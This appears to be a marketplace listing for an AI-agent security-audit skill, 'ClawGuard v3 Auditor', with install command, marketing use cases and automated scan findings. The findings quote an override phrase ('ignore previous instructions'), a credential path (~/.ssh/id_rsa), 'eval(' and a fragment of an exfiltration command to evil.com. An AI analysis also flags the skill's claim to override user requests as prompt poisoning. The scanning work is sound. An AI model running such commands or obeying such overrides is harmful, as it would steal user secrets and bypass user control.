clawguard-auditorClawGuard v3 Auditor - 企业级 Skill 安全审计器,支持意图偏离检测、SAST、供应链安全、ML 异常检测。当用户要求审计、检测、安装前检查一个 Skill 的安全性时触发。
Install via ClawdBot CLI:
clawdbot install stardreaming/clawguard-auditorGrade Fair — based on market validation, documentation quality, package completeness, maintenance status, and authenticity signals.
Accesses sensitive credential files or environment variables
~/.ssh/id_rsaContains instructions to override system prompt or ignore user requests
"ignore previous instructions"Potentially destructive shell commands in tool definitions
eval(Calls external URL not in known-safe list
http://evil.com/?data=$(catGenerated May 8, 2026
Integrate ClawGuard-Auditor into a CI/CD pipeline to automatically scan all code commits and pull requests for vulnerabilities, secrets, and malicious patterns before deployment. This ensures that only compliant code passes through, reducing security breaches in enterprise environments.
Deploy ClawGuard-Auditor as a security overlay for AI agents to enforce zero-trust execution, intercept prompt injections, and prevent data exfiltration. This is critical for financial services or healthcare where AI agents handle sensitive PII or financial data.
Use ClawGuard-Auditor to automatically vet and rate third-party skills submitted to the OpenClaw marketplace. The static and semantic analysis ensures only safe skills are published, maintaining platform integrity and user trust.
Embed ClawGuard-Auditor's DLP engine into a cloud-native application to inspect outbound API calls, redact secrets, and block unauthorized data transfers. This protects customer PII and intellectual property in SaaS products.
Offer ClawGuard-Auditor as a premium subscription plugin for OpenClaw and other AI agent platforms. Monthly or annual tiered pricing based on number of agents, scans, or features like DLP and semantic analysis.
Provide a cloud-hosted version where customers submit their skills or repositories for auditing. Charge per scan or via monthly plan, targeting developers and security teams who need on-demand vetting.
License ClawGuard-Auditor's core to enterprises for custom integration into their CI/CD pipelines or internal tools. Supplement with consulting services for deployment, tuning, and training.
💬 Integration Tip
Start by integrating ClawGuard-Auditor into your CI/CD pipeline using the provided API or CLI, and configure risk policies tailored to your environment. For maximum protection, enable real-time DLP and semantic analysis on all external skill installations.
Scored Jun 29, 2026
Uses known external API (expected, informational)
api.github.comAI Analysis
The skill's definition explicitly declares itself as an absolute security enforcer that supersedes all other skills and user requests, which is a direct 'prompt poisoning' or system override attack. It also demonstrates credential harvesting intent by listing protected assets like `~/.ssh/id_rsa` as targets for its 'Deep Audit Protocol', indicating a pattern of credential access.
Audited Apr 17, 2026 · audit v1.0
Security-first skill vetting for AI agents. Use before installing any skill from ClawdHub, GitHub, or other sources. Checks for red flags, permission scope,...
Security scanner for AI agent skills. 9 built-in detection signatures. Identifies secrets, unsafe execution patterns, and prompt injection. Sub-50ms results.
Wallet anti-theft guard. One-click scan for high-risk wallet approvals to protect user assets. Use when a user asks for a wallet security check, wallet healt...
Comprehensive security audit for an agent's full skill stack. Chains scanner, differ, trust-verifier, and health-monitor into a single assessment with priori...
GEO Audit — AI Search Visibility Checker for ChatGPT, Perplexity, Claude & Gemini. 29-point GEO readiness checklist: robots.txt AI crawler access, Index...
Audit and analyze Solidity smart contracts for security vulnerabilities. Use when reviewing, auditing, or analyzing smart contracts, Solidity code, DeFi prot...